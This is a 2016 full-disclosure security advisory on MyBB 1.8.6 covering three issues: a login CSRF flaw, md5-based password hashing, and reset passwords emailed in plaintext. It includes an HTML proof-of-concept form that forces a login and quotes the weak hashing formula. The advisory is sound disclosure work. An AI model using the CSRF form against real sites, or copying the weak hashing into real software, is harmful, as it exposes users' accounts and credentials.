MyBB 1.8.6: CSRF, Weak Hashing, Plaintext PasswordsDate: 2016-09-15 14:23:25
|Affected Product:||MyBB 1.8.6|
|Fixed in:||not fixed|
|Fixed Version Link:||n/a|
|Vulnerability Type:||CSRF, Weak Hashing, Plaintext Passwords|
|Reported to vendor:||01/29/2016|
|Disclosed to public:||09/15/2016|
|Release mode:||Full Disclosure / Informational|
|Credits||Tim Coen of Curesec GmbH|
MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext.
3. Login CSRF
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker.
Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS.
Proof of Concept
<html> <body> <form action="http://localhost/mybb_1806/Upload/member.php" method="POST"> <input type="hidden" name="action" value="do_login" /> <input type="hidden" name="url" value="http://localhost/mybb_1806/Upload/index.php" /> <input type="hidden" name="quick_login" value="1" /> <input type="hidden" name="quick_username" value="admin" /> <input type="hidden" name="quick_password" value="admin" /> <input type="hidden" name="quick_remember" value="yes" /> <input type="hidden" name="submit" value="Login" /> <input type="submit" value="Submit request" /> </form> </body> </html>
4. Weak Hashing
MyBB uses md5 for hashing passwords, which is not considered secure.
The hashing used is:
$hash = md5(md5($salt).md5($password));
5. Passwords Emailed in Plaintext
When passwords are reset, the generated 8 character password is send to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required.
It is recommended to use a password reset token instead, and to force the user to create a new password themselves.
This issue was not fixed by the vendor.
7. Report Timeline
|01/29/2016||Informed Vendor about Issue|
|02/26/2016||Vendor requests more time|
|03/11/2016||Vendor releases new version|
|03/15/2016||Requested information about unfixed issues|
|03/15/2016||Vendor considers issues minor and will not fix them for now|
|09/15/2016||Disclosed to public|